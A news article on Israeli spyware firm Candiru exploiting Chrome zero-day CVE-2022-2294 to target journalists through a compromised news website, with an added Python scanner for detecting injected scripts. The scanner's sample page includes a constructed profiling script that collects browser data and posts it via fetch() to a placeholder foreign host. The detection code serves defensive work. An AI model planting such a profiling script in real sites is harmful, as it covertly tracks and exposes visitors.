Spyware maker Candiru exploited Google Chrome zero-day to target journalists


A zero-day vulnerability in Google Chrome that was patched earlier this month has been exploited by an Israeli spyware company in attacks targeting journalists in the Middle East.

In a report on Thursday, Czech cybersecurity firm Avast said the zero-day had been used by Candiru, a Tel Aviv-based company also known as Saito Tech, which sells powerful spyware to government customers.

Candiru has a habit of exploiting previously unknown bugs to deploy Windows malware known as DevilsTongue, a modular implant with capabilities similar to NSO Group's Pegasus.

Researchers working for Avast identified the vulnerability in Chrome by examining spyware attacks against the company’s customers.

Avast contacted Google, who acknowledged the issue, assigned it CVE-2022-2294, and fixed it in Chrome version 103.0.5060.114.

Since then, Apple and Microsoft have patched the same vulnerability in their Safari and Edge web browsers.

CVE-2022-2294 is described as a high-severity buffer overflow in WebRTC, which, if successfully exploited, may result in code execution on the victim device.

When Google released the bug fix on July 4, it said the weakness was being actively exploited, but didn’t share any further information.

Avast claims that Candiru began abusing CVE-2022-2294 in March 2022, targeting victims in Lebanon, Yemen, Turkey, and Palestine.

In Lebanon, the attackers gained access to a website used by employees of a news agency. Although it is unclear what the attackers were after, threat actors often target journalists in order to spy directly on them and the stories they are working on, or to reach their sources and collect sensitive information that those sources would share with the media.

According to Avast, the attackers injected malicious JavaScript code into the compromised website, enabling cross-site scripting (XSS) attacks and redirecting valid targets to the exploit server. Through this watering hole attack, they were able to build a profile of the victim’s browser.

This profile consisted of approximately 50 data points, including the victim’s native language, time zone, device type, screen information, referrer, browser plugins, and device memory, among others.

The information was acquired to ensure that the exploit was only sent to the intended targets.

If the profile matched the intended target, an encrypted data exchange was established so that the zero-day exploit could be sent to the victim’s machine.
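The profiling step described above (injected JavaScript reading language, time zone, screen, referrer, plugins and memory, then reporting to a foreign host) leaves traces in the served page that a site operator or incident responder can look for. The following is an added example, not code from Avast's report or from the article: a small Python check that parses a page, flags external scripts whose host is not on the site's own allowlist, and flags inline scripts that read several browser-fingerprinting properties. The allowlist, the placeholder host `cdn.example-injected.invalid` and the sample HTML are all constructed for the example.

```python
"""Added example: page integrity check for injected profiling scripts.
Not from the Avast report or the article; allowlist and sample HTML are constructed."""
import re
from html.parser import HTMLParser

# Browser properties commonly read by fingerprinting code. The article lists
# language, time zone, device type, screen, referrer, plugins and memory.
FINGERPRINT_APIS = (
    "navigator.language", "getTimezoneOffset", "Intl.DateTimeFormat",
    "navigator.platform", "navigator.userAgent",
    "screen.width", "screen.height", "screen.colorDepth",
    "document.referrer", "navigator.plugins",
    "navigator.deviceMemory", "navigator.hardwareConcurrency",
)


class _ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def scan_page(html, allowed_hosts, min_hits=3):
    """Return scripts loaded from hosts outside the allowlist, and inline
    scripts that touch at least `min_hits` distinct fingerprinting APIs."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = {"foreign_scripts": [], "profiling_scripts": []}
    for src in parser.external:
        m = re.match(r"^(?:https?:)?//([^/]+)", src)
        host = m.group(1).lower() if m else None  # None: relative URL, same origin
        if host and host not in allowed_hosts:
            findings["foreign_scripts"].append(src)
    for body in parser.inline:
        hits = sorted({api for api in FINGERPRINT_APIS if api in body})
        if len(hits) >= min_hits:
            findings["profiling_scripts"].append(hits)
    return findings


# Constructed sample: the site's own script, a benign inline snippet, an injected
# external script, and an injected inline profiler posting to a foreign host.
ALLOWED_HOSTS = {"news.example", "static.news.example"}
SAMPLE_HTML = """<html><head>
<script src="https://static.news.example/site.js"></script>
<script>document.getElementById("d").textContent = new Date().toLocaleDateString();</script>
<script src="https://cdn.example-injected.invalid/p.js"></script>
<script>
var p = {lang: navigator.language, tz: new Date().getTimezoneOffset(),
         plat: navigator.platform, sw: screen.width, sh: screen.height,
         ref: document.referrer, plugins: navigator.plugins.length,
         mem: navigator.deviceMemory};
fetch("https://cdn.example-injected.invalid/profile", {method: "POST", body: JSON.stringify(p)});
</script>
</head><body><span id="d"></span></body></html>"""

if __name__ == "__main__":
    for kind, items in scan_page(SAMPLE_HTML, ALLOWED_HOSTS).items():
        for item in items:
            print(f"{kind}: {item}")
```

The API-count threshold is deliberately low: legitimate analytics scripts also read a property or two, but a block that reads the language, time zone, screen, referrer, plugins and memory together and posts the result elsewhere matches the profiling pattern the article describes. Run against a page fetched from the live site (rather than from the repository) so that content injected after deployment is caught.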

In the case of Lebanon, the zero-day vulnerability allowed the attackers to execute shellcode in a renderer process. They then chained it with a sandbox escape to gain an initial foothold and used that to deploy the DevilsTongue payload.

The DevilsTongue malware further used a BYOVD (bring your own vulnerable driver) step to elevate its privileges and gain read/write access to the affected device’s memory.

Researchers say the sophisticated malware is capable of logging keystrokes and exfiltrating messages, browsing history, passwords, geolocation and much more. It can even record using the victim’s camera and microphone.

Zero-day exploits developed by Candiru were the subject of reports from Microsoft, Citizen Lab and Google last year.

The attacks targeted Chrome, Internet Explorer, Safari, as well as Windows, macOS, iOS and Android devices.

According to a Citizen Lab report from April this year, surveillance tools created by Candiru and Israeli surveillance company NSO Group have also been used in Spain.

Both Candiru and NSO Group were blacklisted by the United States last year.